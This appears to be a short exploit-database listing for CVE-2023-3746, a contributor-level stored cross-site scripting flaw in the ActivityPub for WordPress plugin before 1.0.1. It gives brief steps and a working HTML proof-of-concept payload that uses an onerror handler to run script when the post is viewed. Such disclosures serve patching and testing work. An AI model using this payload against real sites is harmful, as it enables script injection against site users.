Exploit for ActivityPub for WordPress < 1.0.1 - Contributor+ Stored XSS CVE-2023-3746

Name: Exploit for ActivityPub for WordPress < 1.0.1 - Contributor+ Stored XSS CVE-2023-3746
Rating: 5 (84 reviews)

2023-09-25 | CVSS 4.9

## https://sploitus.com/exploit?id=WPEX-ID:C15A6032-6495-47A8-828C-37E55ED9665A
As a contributor, create or edit a post with the payload below while in code editor mode

<img src="404" id="!#!#PROTECT0#!#!"/><pre class=" onerror=alert(document.domain) ">xyz</pre>

The XSS will be triggered when viewing/previewing the post